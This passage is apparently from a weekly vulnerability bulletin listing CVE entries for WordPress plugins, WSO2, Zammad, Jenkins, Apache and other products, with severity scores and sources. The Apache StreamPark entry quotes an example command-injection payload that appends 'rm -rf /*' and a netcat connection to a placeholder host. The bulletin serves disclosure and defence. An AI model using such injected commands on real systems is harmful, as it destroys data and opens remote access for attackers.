wordpress — wordpress The File Manager WordPress plugin before 6.3 does not restrict the file managers root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites files. 2023-12-11 6.5 CVE-2023-5907
contact@wpscan.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Andreas Münch Multiple Post Passwords allows Stored XSS.This issue affects Multiple Post Passwords: from n/a through 1.1.1. 2023-12-14 5.9 CVE-2023-49157
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Real Big Plugins Client Dash allows Stored XSS.This issue affects Client Dash: from n/a through 2.2.1. 2023-12-15 5.9 CVE-2023-49165
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS.This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5. 2023-12-15 5.9 CVE-2023-49174
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS.This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1. 2023-12-15 5.9 CVE-2023-49175
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS.This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2. 2023-12-15 5.9 CVE-2023-49180
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS.This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40. 2023-12-15 5.9 CVE-2023-49181
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS.This issue affects Parallax Slider Block: from n/a through 1.2.4. 2023-12-15 5.9 CVE-2023-49184
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS.This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4. 2023-12-15 5.9 CVE-2023-49188
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS.This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12. 2023-12-15 5.9 CVE-2023-49189
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS.This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6. 2023-12-15 5.9 CVE-2023-49190
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS.This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2. 2023-12-15 5.9 CVE-2023-49191
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kyle Phillips Nested Pages allows Stored XSS.This issue affects Nested Pages: from n/a through 3.2.6. 2023-12-14 5.9 CVE-2023-49195
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Jeff Starr Dashboard Widgets Suite allows Stored XSS.This issue affects Dashboard Widgets Suite: from n/a through 3.4.1. 2023-12-14 5.9 CVE-2023-49743
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce.This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3. 2023-12-15 5.4 CVE-2023-49744
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WebFactory Ltd Guest Author allows Stored XSS.This issue affects Guest Author: from n/a through 2.3. 2023-12-15 5.9 CVE-2023-49747
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS.This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. 2023-12-15 5.9 CVE-2023-49767
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Peter Raschendorfer Smart External Link Click Monitor [Link Log] allows Stored XSS.This issue affects Smart External Link Click Monitor [Link Log]: from n/a through 5.0.2. 2023-12-14 5.9 CVE-2023-49770
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS.This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4. 2023-12-15 5.9 CVE-2023-49829
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brontobytes Cookie Bar allows Stored XSS.This issue affects Cookie Bar: from n/a through 2.0. 2023-12-14 5.9 CVE-2023-49836
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in FancyThemes Optin Forms – Simple List Building Plugin for WordPress allows Stored XSS.This issue affects Optin Forms – Simple List Building Plugin for WordPress: from n/a through 1.3.3. 2023-12-14 5.9 CVE-2023-49841
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in wpexpertsio Rocket Maintenance Mode & Coming Soon Page allows Stored XSS.This issue affects Rocket Maintenance Mode & Coming Soon Page: from n/a through 4.3. 2023-12-14 5.9 CVE-2023-49842
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case.This issue affects DoFollow Case by Case: from n/a through 3.4.2. 2023-12-15 4.3 CVE-2023-49197
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!.This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23. 2023-12-15 4.3 CVE-2023-49749
audit@patchstack.com
wordpress — wordpress The WP Crowdfunding WordPress plugin before 2.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-11 4.8 CVE-2023-5757
contact@wpscan.com
wordpress — wordpress The WP Not Login Hide (WPNLH) WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-11 4.8 CVE-2023-5940
contact@wpscan.com
wordpress — wordpress The Contact Form Email WordPress plugin before 1.3.44 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-11 4.8 CVE-2023-5955
contact@wpscan.com
wso2 — wso2_api_manager Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests. 2023-12-15 6.1 CVE-2023-6838
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — wso2_api_manager Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response. 2023-12-15 5.3 CVE-2023-6839
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — wso2_api_manager Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated. 2023-12-15 4.3 CVE-2023-6835
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — wso2_api_manager Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information. 2023-12-15 4.6 CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
xaviershay-dm-rails_porject — xaviershay-dm-rails The xaviershay-dm-rails gem 0.10.3.8 for Ruby allows local users to discover MySQL credentials by listing a process and its arguments. 2023-12-12 5.5 CVE-2015-2179
cve@mitre.org
xunruicms — xunruicms XunRuiCMS v4.5.5 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin.php. 2023-12-11 6.1 CVE-2023-49490
cve@mitre.org
xwiki — xwiki_platform XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki’s regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability. 2023-12-15 5.3 CVE-2023-50720
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
zammad — zammad An issue was discovered in Zammad before 6.2.0. It uses the public endpoint /api/v1/signshow for its login screen. This endpoint returns internal configuration data of user object attributes, such as selectable values, which should not be visible to the public. 2023-12-10 5.3 CVE-2023-50453
cve@mitre.org
zammad — zammad An issue was discovered in Zammad before 6.2.0. In several subsystems, SSL/TLS was used to establish connections to external services without proper validation of hostname and certificate authority. This is exploitable by man-in-the-middle attackers. 2023-12-10 5.9 CVE-2023-50454
cve@mitre.org
zammad — zammad An issue was discovered in Zammad before 6.2.0. An attacker can trigger phishing links in generated notification emails via a crafted first or last name. 2023-12-10 5.3 CVE-2023-50456
cve@mitre.org
zammad — zammad An issue was discovered in Zammad before 6.2.0. When listing tickets linked to a knowledge base answer, or knowledge base answers of a ticket, a user could see entries for which they lack permissions. 2023-12-10 4.3 CVE-2023-50457
cve@mitre.org
zoom — multiple_products Cryptographic issues Zoom Mobile App for Android, Zoom Mobile App for iOS, and Zoom SDKs for Android and iOS before version 5.16.0 may allow a privileged user to conduct a disclosure of information via network access. 2023-12-13 4.9 CVE-2023-43583
security@zoom.us
zoom — zoom Improper authentication in some Zoom clients before version 5.16.5 may allow an authenticated user to conduct a denial of service via network access. 2023-12-13 6.4 CVE-2023-49646
security@zoom.us
zte — mc801a There is a buffer overflow vulnerability in some ZTE mobile internet producsts. Due to insufficient validation of tcp port parameter, an authenticated attacker could use the vulnerability to perform a denial of service attack.  2023-12-14 5.9 CVE-2023-25642
psirt@zte.com.cn
zte — multiple_products There is a denial of service vulnerability in some ZTE mobile internet products. Due to insufficient validation of Web interface parameter, an attacker could use the vulnerability to perform a denial of service attack. 2023-12-14 6.5 CVE-2023-25644
psirt@zte.com.cn
zte — multiple_products There is a SQL injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of SMS interface parameter, an authenticated attacker could use the vulnerability to execute SQL injection and cause information leak. 2023-12-14 4.3 CVE-2023-25651
psirt@zte.com.cn
zte — zxcloud_irai There is a weak folder permission vulnerability in ZTE’s ZXCLOUD iRAI product. Due to weak folder permission, an attacker with ordinary user privileges could construct a fake DLL to execute command to escalate local privileges. 2023-12-14 6.5 CVE-2023-25648
psirt@zte.com.cn
zte — zxcloud_irai There is an arbitrary file download vulnerability in ZXCLOUD iRAI. Since the backend does not escape special strings or restrict paths, an attacker with user permission could access the download interface by modifying the request parameter, causing arbitrary file downloads. 2023-12-14 6.5 CVE-2023-25650
psirt@zte.com.cn

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction. 2023-12-15 3.5 CVE-2023-48608
psirt@adobe.com
apache — server A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the ‘alias’ parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page. The impact of this vulnerability is considered as Low, as the cluster_manager URL should not be exposed outside and is protected by user/password. 2023-12-12 3.5 CVE-2023-6710
secalert@redhat.com
secalert@redhat.com
apple — macos This issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.2. Secure text fields may be displayed via the Accessibility Keyboard when using a physical keyboard. 2023-12-12 2.4 CVE-2023-42874
product-security@apple.com
product-security@apple.com
codeastro — pos_and_inventory_management_system A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /item/item_con. The manipulation of the argument item_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247911. 2023-12-13 3.5 CVE-2023-6775
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fortinet — multiple_products An improper access control vulnerability [CWE-284] in FortiOS version 7.2.0, version 7.0.13 and below, version 6.4.14 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below may allow a remote unauthenticated attacker to bypass the firewall deny geolocalisation policy via timing the bypass with a GeoIP database update. 2023-12-13 3.1 CVE-2023-47536
psirt@fortinet.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they’re not a member of. 2023-12-15 2 CVE-2023-3511
cve@gitlab.com
cve@gitlab.com
h2o — h2o h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. The QUIC stack (quicly), as used by H2O up to commit 43f86e5 (in version 2.3.0-beta and prior), is susceptible to a state exhaustion attack. When H2O is serving HTTP/3, a remote attacker can exploit this vulnerability to progressively increase the memory retained by the QUIC stack. This can eventually cause H2O to abort due to memory exhaustion. The vulnerability has been resolved in commit d67e81d03be12a9d53dc8271af6530f40164cd35. HTTP/1 and HTTP/2 are not affected by this vulnerability as they do not use QUIC. Administrators looking to mitigate this issue without upgrading can disable HTTP/3 support. 2023-12-12 3.7 CVE-2023-50247
security-advisories@github.com
security-advisories@github.com
hcl_software — hcl_connections HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data. 2023-12-15 3.5 CVE-2023-28022
psirt@hcl.com
nautobot — nautobot Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. In Nautobot 1.x and 2.0.x prior to 1.6.7 and 2.0.6, the URLs `/files/get/?name=…` and `/files/download/?name=…` are used to provide admin access to files that have been uploaded as part of a run request for a Job that has FileVar inputs. Under normal operation these files are ephemeral and are deleted once the Job in question runs. In the default implementation used in Nautobot, as provided by `django-db-file-storage`, these URLs do not by default require any user authentication to access; they should instead be restricted to only users who have permissions to view Nautobot’s `FileProxy` model instances. Note that no URL mechanism is provided for listing or traversal of the available file `name` values, so in practice an unauthenticated user would have to guess names to discover arbitrary files for download, but if a user knows the file name/path value, they can access it without authenticating, so we are considering this a vulnerability. Fixes are included in Nautobot 1.6.7 and Nautobot 2.0.6. No known workarounds are available other than applying the patches included in those versions. 2023-12-12 3.7 CVE-2023-50263
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
newsletter_software — supermailer Improper input validation vulnerability in Newsletter Software SuperMailer affecting version 11.20.0.2204. An attacker could exploit this vulnerability by sending a malicious configuration file (file with SMB extension) to a user via a link or email attachment and persuade the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to crash the application when attempting to load the malicious file. 2023-12-13 3.3 CVE-2023-6381
cve-coordination@incibe.es
palo_alto_networks — pan-os An improper privilege management vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-only administrator to revoke active XML API keys from the firewall and disrupt XML API usage. 2023-12-13 2.7 CVE-2023-6793
psirt@paloaltonetworks.com
sap — cloud_connector SAP Cloud Connector – version 2.0, allows an authenticated user with low privilege to perform Denial of service attack from adjacent UI by sending a malicious request which leads to low impact on the availability and no impact on confidentiality or Integrity  of the application. 2023-12-12 3.5 CVE-2023-49578
cna@sap.com
cna@sap.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The Web UI of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the server. The server will automatically restart. 2023-12-12 2.7 CVE-2023-48429
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The REST API of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the API. The server will automatically restart. 2023-12-12 2.7 CVE-2023-48430
productcert@siemens.com
typecho — typecho A vulnerability classified as problematic was found in Typecho 1.2.1. Affected by this vulnerability is an unknown functionality of the file /admin/manage-pages.php of the component Page Handler. The manipulation leads to backdoor. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 2.7 CVE-2023-6614
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
umbraco — umbraco Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.7.0, and 12.1.0, a user with access to a specific part of the backoffice is able to inject HTML code into a form where it is not intended. Versions 8.18.10, 10.7.0, and 12.1.0 contain a patch for this issue. 2023-12-12 3.5 CVE-2023-38694
security-advisories@github.com
wordpress — wordpress The Welcart e-Commerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.9.6 via the upload_certificate_file function. This makes it possible for administrators to upload .pem or .crt files to arbitrary locations on the server. 2023-12-09 2.7 CVE-2023-6120
security@wordfence.com
security@wordfence.com
security@wordfence.com

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
acronis — acronis_cyber_protect_cloud_agent Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 36943. 2023-12-14 not yet calculated CVE-2023-48676
security@acronis.com
apache — dubbo A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 not yet calculated CVE-2023-29234
security@apache.org
security@apache.org
apache — dubbo Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 not yet calculated CVE-2023-46279
security@apache.org
security@apache.org
apache — shiro URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability when “form” authentication is used in Apache Shiro. Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+. 2023-12-14 not yet calculated CVE-2023-46750
security@apache.org
apache — streampark In streampark, there is a project module that integrates Maven’s compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use “||” or “&&”: /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & 2023-12-15 not yet calculated CVE-2023-49898
security@apache.org
apache — streampark_platform In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like ‘%jobName%’. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. 2023-12-15 not yet calculated CVE-2023-30867
security@apache.org
apache — couchdb Design document functions which receive a user http request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions are: *   list *   show *   rewrite *   update An attacker can leak the session component using an HTML-like output, insert the session as an external resource (such as an image), or store the credential in a _local document with an “update” function. For the attack to succeed the attacker has to be able to insert the design documents into the database, then manipulate a user to access a function from that design document. Workaround: Avoid using design documents from untrusted sources which may attempt to access or manipulate request object’s headers 2023-12-13 not yet calculated CVE-2023-45725
security@apache.org
security@apache.org
aveva — edge An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed. 2023-12-16 not yet calculated CVE-2021-42796
cve@mitre.org
cve@mitre.org
aveva — edge Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources. 2023-12-16 not yet calculated CVE-2021-42797
cve@mitre.org
cve@mitre.org
buy_addons — bavideotab SQL injection vulnerability in Buy Addons bavideotab before version 1.0.6, allows attackers to escalate privileges and obtain sensitive information via the component BaVideoTabSaveVideoModuleFrontController::run(). 2023-12-14 not yet calculated CVE-2023-48925
cve@mitre.org
cams_biometrics — multiple_products SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component. 2023-12-15 not yet calculated CVE-2023-48050
cve@mitre.org
cjson — cjson cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_InsertItemInArray at cJSON.c. 2023-12-14 not yet calculated CVE-2023-50471
cve@mitre.org
cjson — cjson cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_SetValuestring at cJSON.c. 2023-12-14 not yet calculated CVE-2023-50472
cve@mitre.org
common_services — soliberte SQL Injection vulnerability in functions/point_list.php in Common Services soliberte before v4.3.03 allows attackers to obtain sensitive information via the lat and lng parameters. 2023-12-14 not yet calculated CVE-2023-40921
cve@mitre.org
cybrosys_techno_solutions — website_blog_search A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component. 2023-12-15 not yet calculated CVE-2023-48049
cve@mitre.org
dedebiz — dedebiz Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature. 2023-12-14 not yet calculated CVE-2023-31546
cve@mitre.org
dreamer_cms — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/database/backup 2023-12-14 not yet calculated CVE-2023-50017
cve@mitre.org
emlog_pro — emlog_pro Emlog Pro v2.1.14 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin/article.php?active_savedraft. 2023-12-14 not yet calculated CVE-2023-41618
cve@mitre.org
emlog_pro — emlog_pro A Cross Site Scripting (XSS) vulnerability was discovered in Emlog Pro v2.1.14 via the component /admin/store.php. 2023-12-13 not yet calculated CVE-2023-41621
cve@mitre.org
empirecms — empirecms EmpireCMS v7.5 was discovered to contain a SQL injection vulnerability via the ftppassword parameter at SetEnews.php. 2023-12-14 not yet calculated CVE-2023-50073
cve@mitre.org
eyoucms — eyoucms A stored cross-site scripting (XSS) vulnerability in EyouCMS-V1.6.5-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Public Security Registration Number parameter. 2023-12-14 not yet calculated CVE-2023-50566
cve@mitre.org
fluid_components — fluid_components The fluid_components (aka Fluid Components) extension before 3.5.0 for TYPO3 allows XSS via a component argument parameter, for certain {content} use cases that may be edge cases. 2023-12-12 not yet calculated CVE-2023-28604
cve@mitre.org
cve@mitre.org
freebsd — freebsd In versions of FreeBSD 14.0-RELEASE before 14-RELEASE-p2, FreeBSD 13.2-RELEASE before 13.2-RELEASE-p7 and FreeBSD 12.4-RELEASE before 12.4-RELEASE-p9, the pf(4) packet filter incorrectly validates TCP sequence numbers.  This could allow a malicious actor to execute a denial-of-service attack against hosts behind the firewall. 2023-12-13 not yet calculated CVE-2023-6534
secteam@freebsd.org
freebsd — freebsd When a program running on an affected system appends data to a file via an NFS client mount, the bug can cause the NFS client to fail to copy in the data to be written but proceed as though the copy operation had succeeded. This means that the data to be written is instead replaced with whatever data had been in the packet buffer previously. Thus, an unprivileged user with access to an affected system may abuse the bug to trigger disclosure of sensitive information. In particular, the leak is limited to data previously stored in mbufs, which are used for network transmission and reception, and for certain types of inter-process communication. The bug can also be triggered unintentionally by system applications, in which case the data written by the application to an NFS mount may be corrupted. Corrupted data is written over the network to the NFS server, and thus also susceptible to being snooped by other hosts on the network. Note that the bug exists only in the NFS client; the version and implementation of the server has no effect on whether a given system is affected by the problem. 2023-12-13 not yet calculated CVE-2023-6660
secteam@freebsd.org
gradio-app — gradio-app/gradio Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository gradio-app/gradio prior to main. 2023-12-14 not yet calculated CVE-2023-6572
security@huntr.dev
security@huntr.dev
grzegorz_marczynski — dynamic_progress_bar A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component. 2023-12-15 not yet calculated CVE-2023-40954
cve@mitre.org
cve@mitre.org
h2oai — h2oai/h2o-3 External Control of File Name or Path in h2oai/h2o-3 2023-12-14 not yet calculated CVE-2023-6569
security@huntr.dev
hp —  officejet_pro Certain HP OfficeJet Pro printers are potentially vulnerable to a Denial of Service when sending a SOAP message to the service on TCP port 3911 that contains a body but no header. 2023-12-14 not yet calculated CVE-2023-4694
hp-security-alert@hp.com
insyde — insydeh2o TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process. 2023-12-16 not yet calculated CVE-2022-24351
cve@mitre.org
cve@mitre.org
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance. 2023-12-16 not yet calculated CVE-2023-39340
support@hackerone.com
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker impersonating an administrator may craft a specific web request which may lead to remote code execution. 2023-12-14 not yet calculated CVE-2023-41719
support@hackerone.com
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker with a foothold on an Ivanti Connect Secure (ICS) appliance can escalate their privileges by exploiting a vulnerable installed application. This vulnerability allows the attacker to gain elevated execution privileges on the affected system. 2023-12-14 not yet calculated CVE-2023-41720
support@hackerone.com
jenkins — jenkins Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing attackers with Scriptler/Configure permission to delete arbitrary files on the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50764
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins A missing permission check in Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier allows attackers with Overall/Read permission to read the contents of a Groovy script by knowing its ID. 2023-12-13 not yet calculated CVE-2023-50765
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to send an HTTP request to an attacker-specified URL and parse the response as XML. 2023-12-13 not yet calculated CVE-2023-50766
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML. 2023-12-13 not yet calculated CVE-2023-50767
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2023-12-13 not yet calculated CVE-2023-50768
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2023-12-13 not yet calculated CVE-2023-50769
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
